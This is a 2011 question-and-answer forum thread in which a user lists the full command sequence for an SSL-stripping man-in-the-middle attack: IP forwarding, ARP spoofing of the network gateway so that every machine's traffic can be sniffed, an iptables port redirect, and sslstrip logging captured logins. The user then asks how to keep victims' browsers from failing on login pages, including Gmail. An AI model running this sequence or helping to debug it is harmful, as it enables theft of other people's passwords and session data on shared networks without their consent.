General Question

XOIIO's avatar

SSLSTRIP crashes internet connection, how do I avoid this?

Asked by XOIIO (18328points) August 28th, 2011

While experienting with sslsrip, this code is what I’ve been using

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward (returned with NUM 1)

arpspoof -i wlan0 192.168.1.1 (gateway is just being used so that I can sniff the whole network)

iptables—flush

iptables -t nat -A PREROUTING -p tcp—destination-port 80 -j REDIRECT—to-port 8080

sslstrip -a -f -k -l 8080
(creates sslstrip.log)

unfortunatly on several site logins, internet explorer crashes, saying it cant connect to the web page. How can I fix this?

Observing members: 0 Composing members: 0

2 Answers

XOIIO's avatar

changing the port to the default 1000 works, but it doesnt capture any data. arghh

XOIIO's avatar

alright so This one works, except it crashes gmail. any way around that?

I figured gmail was too secure *smirks *

Answer this question

Login

or

Join

to answer.

This question is in the General Section. Responses must be helpful and on-topic.

Your answer will be saved while you login or join.

Have a question? Ask Fluther!

What do you know more about?
or
Knowledge Networking @ Fluther